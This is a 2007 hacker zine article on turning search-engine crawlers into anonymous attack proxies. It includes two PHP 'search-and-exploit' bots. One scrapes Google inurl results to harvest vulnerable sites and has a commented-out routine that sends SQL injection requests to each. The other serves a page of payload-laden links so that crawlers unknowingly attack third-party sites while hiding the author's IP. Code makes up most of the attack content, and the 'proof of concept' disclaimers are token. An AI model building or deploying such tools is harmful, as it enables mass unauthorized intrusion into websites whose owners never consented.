Title: I, Bot. Taking advantage of robots power.
Re: "Against the System: Rise of the Robots" of Michal Zalewski

Author: Crossbower - crossbower#katamail.com
Site: http://www.playhack.net

Date: 2007-04-18

---------------------------------------------------------------------------------


-[ SUMMARY ]---------------------------------------------------------------------

0x00: Intro, let's start
0x01: Abstract
0x02: Implementation
0x03: The code: Paranoid Android
0x04: Conclusion

---------------------------------------------------------------------------------


---[ 0x00: Intro, let's start ]

Hello to everybody. I'm very sorry for my poor english but it's not my
first language. I hope you will excuse eventual errors Wink

This paper wants to be a reply to an article published on Phrack by Michal Zalewski.
He was the first that has assumed the possibility to take advantage by multitude of
robots that every moment scanning the web to search information.
We begin with the introduction to the article of Zalewski, then will see how
implementing its ideas for writing ours bots.

"Consider a remote exploit that is able to compromise a remote system
without sending any attack code to his victim. Consider an exploit
which simply creates local file to compromise thousands of computers,
and which does not involve any local resources in the attack. Welcome to
the world of zero-effort exploit techniques. Welcome to the world of
automation, welcome to the world of anonymous, dramatically difficult
to stop attacks resulting from increasing Internet complexity.

Zero-effort exploits create their 'wishlist', and leave it somewhere
in cyberspace - can be even its home host, in the place where others
can find it. Others - Internet workers (see references, [D]) - hundreds
of never sleeping, endlessly browsing information crawlers, intelligent
agents, search engines... They come to pick this information, and -
unknowingly - to attack victims. You can stop one of them, but can't
stop them all. You can find out what their orders are, but you can't
guess what these orders will be tomorrow, hidden somewhere in the abyss
of not yet explored cyberspace.

Your private army, close at hand, picking orders you left for them
on their way. You exploit them without having to compromise them. They
do what they are designed for, and they do their best to accomplish it.
Welcome to the new reality, where our A.I. machines can rise against us."

Now we see as all this is possible in reality Wink Have fun!

-----------------------------------------------------------------------------[/]


---[ 0x01: Abstract ]


The idea that the search engines (first of all Google) could be transformed
in powerful arms in the hands of attackers is not new.
Google hacking, search dork, cache digging, are all techniques that allow
to take advantage of a minimal part of motors acquaintance, but a very few
persons, till now, had thought to use their more sensitive and powerful part,
the robot... and this is the topic of this article.

A robot is a program that automatically traverses the Web's hypertext structure
by retrieving pages or documents, and recursively retrieving all documents that
are referenced.
Note that "recursive" here doesn't limit the definition to any specific traversal
algorithm. Even if a robot applies some heuristic to the selection and order of
documents to visit and spaces out requests over a long space of time, it is still
a robot.
Normal Web browsers aren't robots, because they are operated by a human, and
don't automatically retrieve referenced documents.

Web robots are sometimes referred to as Web Wanderers, Web Crawlers, or Spiders.
These names are a bit misleading because they give the impression the software itself
moves between sites like a virus. This not the case, a robot simply visits sites
by requesting documents from them.

What kinds of robots are there? Robots can be used for a number of purposes:
* Indexing
* HTML validation
* Link validation
* "What's New" monitoring
* Mirroring

How many robots circulate in the web?

For having a complete panoramic you can consult the list of active bot
(http://www.robotstxt.org/wc/active/html/type.html).
We will not deepen because this argument does not belong to the article's
subject.

-----------------------------------------------------------------------------[/]

---[ 0x02: Implementation ]

Which are the force point of a bot?
Surely the speed, the ability to execute a great number of operations in a
little time..
For the exploiting we can write a bot with a function like mirroring,
that with the informations found in a database or in a search engine, can complete
mass penetrations without scanning a great number of useless targets.

A first (and simple) implementation is this script. It can search in a search
engine like google (or other..) and create an array with the addresses
of sites with determined web pages. If qualified, it can exploit automatically
many type of vulnerabilities (for example the sql injection).
Although it is a simple script can become a destructive arm used in the
mistaken way (ok noob?).
I ask therefore eventual readers lamer not to use it in order to damage. It's only
Proof of Concept.


- - - - -

    code:  - - - - -

    #!/usr/bin/php

    <?
    echo "
           --- Google Finder ---
     Automatic SaE (search-and-exploit) Bot
      by Crossbower <crossbower AT katamail DOT com>

    ";

    if ($argc<2) {
    echo "Usage: ".$argv[0]." <string> <result>
    Example:
    ".$argv[0]." /script/vuln.php?cmd= 30

    ";
    die;
    }

    //Init...
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);

    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';


    function SendPack($packet)
    {
      global $proxy, $host, $port, $proxy_regex;
     
      if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
        }
      }
      else {
       $c = preg_match($proxy_regex,$proxy);
        if (!$c) {
          echo 'Not a valid proxy...';die;
        }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
          echo 'No response from proxy...';die;
       }
      }
      fputs($ock,$packet);
      if ($proxy=='') {
        $buffer='';
        while (!feof($ock)) {
          $buffer.=fgets($ock);
        }
      }
      else {
        $buffer='';
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$buffer))) {
          $buffer.=fread($ock,1);
        }
      }
      fclose($ock);
      return($buffer);
    }


    //Global variables
    $host="www.google.com"; //Our vulnerability database ;)
    $path=$argv[1];         //String
    $port=80;               //Port (Web)
    $proxy="";              //For your proxy
    $html;                  //Buffer for result

    //Google variables
    $SeInurl="/search?q=inurl%3A"; //Search inurl
    $SeType="&btnG=Search";        //Search type
    if ($argv[2]) $SeNumber="&num=".$argv[2];
    else $SeNumber="&num=20";      //Number of result

    if ($path[0]<>'/')  {print("*warning: string must begin with '/'\n");}
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

    //$path=urlencode($path);   //Url encoding


    echo "1: Find Targets...\n\n";
    //Google's inurl search (example):
    //http://www.google.com/search?q=inurl%3A%2Fscript%2Fvuln.php%3Fcmd%3D&num=30&btnG=Search

    /* Make and Send Query */
    $packet ="GET ".$SeInurl.$path.$SeNumber.$SeType." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";

    $html=SendPack($packet);

    /* Find targets urls */
    preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);
    for ($i=0; $i<count($match[1]); $i++)
            if (strstr($match[1][$i],$path) && !strstr($match[1][$i],"google") && !strstr($match[1][$i],"cache")) echo $match[1][$i]."\n";


    /* This code is for exploiting targets. It's Prof of Concept and it isn't complete.
       Don't use for laming

    $ExplString="?var=" //String for exploiting. Good for sql injection.

    for ($i=0; $i<count($match[1]); $i++)
         if (strstr($match[1][$i],$path) && !strstr($match[1][$i],"google") && !strstr($match[1][$i],"cache"))
    {

    $host=$match[1][$i];

    // Make and Send Exploit
    $packet ="GET ".$match[1][$i].$ExplString." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";

    $buffer=SendPack($packet);

    if (strstr($buffer,$success)) //If the result is positive
    // Print result
    echo $buffer;
    }
    */

    ?>

    - - - - -

- - - - -


-----------------------------------------------------------------------------[/]

---[ 0x03: The code: Paranoid Android ]

Now we try to implement a different code. A code that uses, in a truly new way,
the crawler of search engines.

The operations of a crawler are simple:
In general, it starts with a list of URLs to visit, called the "seeds".
As the crawler visits these URLs, it identifies all the hyperlinks in the page
and adds them to the list of URLs to visit, called the "crawl frontier".
URLs from the frontier are recursively visited according to a set of policies.

As we can see, this method is closely correlated to the contents of a web page,
that can send it to explore other numerous links.
Now we ask ourselves: how much will be sure this type of method?

We suppose that visited website contains exploit links (example: sql injection)
that call other dynamic pages of websites. What happens in this case?
The heuristic spider follows the links and injects code to the websites.
Then, it saves all result to the database of its search engine.
It's not fantastic? Wink

And in logs which IP does remain? The IP of the search engine, that with the many
sites visited every day by its spider, will make an hard work to find our malicious
site. If it is disposed to make searches…
In any case if our site is uncovered, how many other searches are necessary to
find the guilty?

Now because the code is better than thousand words, here a robot that if configured
correctly can use the techniques described in this article.

Voilà Paranoid Android:

- - - - -

    code:  - - - - -

    <HTML>
    <HEAD>
    <TITLE>Paranoid Android, By Crossbower</TITLE>
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
    <META HTTP-EQUIV="Content-Language" CONTENT=en>
    <META name="Keywords" content="Search Bot, ParAnd. PA Robot.">
    </HEAD>
    <BODY>

    <?
    //CONFIGURATION OF THE BOT:

    //Main settings
    $string="vuln.php";      //Define the url or the vulnerabilities to try
    $exploit="?a='SQL";      //Define the exploit for the vulnerabilities
    $LogFile="BotLog.html";  //Log file

    //Global variables
    $host="www.google.com";  //Our vulnerability database ;)
    $port=80;                //Port (Web)
    $html;                   //Buffer for result

    //Google variables
    $SeInurl="/search?q=inurl%3A";  //Search inurl
    $SeCache="/search?q=cache%3A";  //Search cache
    $SeType="&btnG=Search";         //Search type
    $SeNumber="&num=5";             //Number of result

    /*
    Google's inurl search (example):
    http://www.google.com/search?q=inurl%3A%2Fscript%2Fvuln.php%3Fcmd%3D&num=30&btnG=Search
    */

    //$string=urlencode($string);   //Url encoding

    //CONFIGURATION END

    echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    --- PARANOID ANDROID ---                <br>&nbsp;
    Automatic SaE (search-and-exploit) Bot  <br>&nbsp;&nbsp;
    by Crossbower Crossbower*katamail*com <br>

    <Thanks to: Radiohead, for the music and the name>
    <br>
    ";


    //Loading...
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);

    function SendPack($packet)
    {
      global $host, $port;
     
       $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
        }
       
      fputs($ock,$packet);
     
       $buffer='';
        while (!feof($ock)) {
          $buffer.=fgets($ock);
        }
     
      fclose($ock);
      return($buffer);
    }


    //START:
    /* Make and Send Query */
    $packet ="GET ".$SeInurl.$string.$SeNumber.$SeType." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";

    $html=SendPack($packet);

    //Open log file
    $handle =fopen($LogFile,'a');

    //Inizialize the log
    fwrite($handle,"\n# ".date("D dS M, Y h:i a :")."<br><br>\n");
    fwrite($handle,"Visited by:<br>\n");

    $Spider =$REMOTE_HOST."<br>".$REMOTE_ADDR."<br>";
    $Spider.=$HTTP_USER_AGENT."<br>".$HTTP_REFERER."<br>";
    $Spider.=$HTTP_ACCEPT_LANGUAGE."<br><br>\n";

    fwrite($handle,$Spider);
    fwrite($handle,"Links (google cache):<br>\n");

    $Log ="<a href=\"";
    $Log.="http://".$host.$SeCache;


    //Find targets
    preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);

    for ($i=0; $i<count($match[1]); $i++) {
    //Select the result:
    if (  strstr($match[1][$i],$string)  &&
         !strstr($match[1][$i],"google") &&
         !strstr($match[1][$i],"cache"))
    {
       echo "<a href=\"".$match[1][$i].$exploit."\">".$match[1][$i].$exploit."</a><br>\n";
       
       //Update log
       fwrite($handle,$Log.$match[1][$i].$exploit."\">".$match[1][$i].$exploit."</a><br>\n");
    }}

    //Close log
    fwrite($handle,"<br><br>\n");
    fclose($handle);

    ?>
    </BODY>
    </HTML>

    - - - - -

- - - - -

-----------------------------------------------------------------------------[/]

---[ 0x06: Conclusion ]

I hope these informations have interested to you and they have made you to
comprise the gravity of the possible attacks with robots, in future...

In order to deepen you can read these documents:

- "Against the System: Rise of the Robots" by Michal Zalewski
http://www.phrack.org/archives/57/p57-0x13

- "The Anatomy of a Large-Scale Hypertextual Web Search Engine"
Googlebot concept, Sergey Brin, Lawrence Page, Stanford University
http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm

- Proprietary web solutions security, Michal Zalewski
http://lcamtuf.coredump.cx/milpap.txt

- "A Standard for Robot Exclusion", Martijn Koster
http://info.webcrawler.com/mak/projects/robots/norobots.html

- "The Web Robots Database"
http://www.robotstxt.org/wc/active.html
http://www.robotstxt.org/wc/active/html/type.html

- "Web Security FAQ", Lincoln D. Stein
http://www.w3.org/Security/Faq/www-security-faq.html


Ok, this is all people...
For clarifications, questions and other esitate to mail me Wink

Crossbower - crossbower#katamail.com
Site: http://www.playhack.net

-----------------------------------------------------------------------------[/]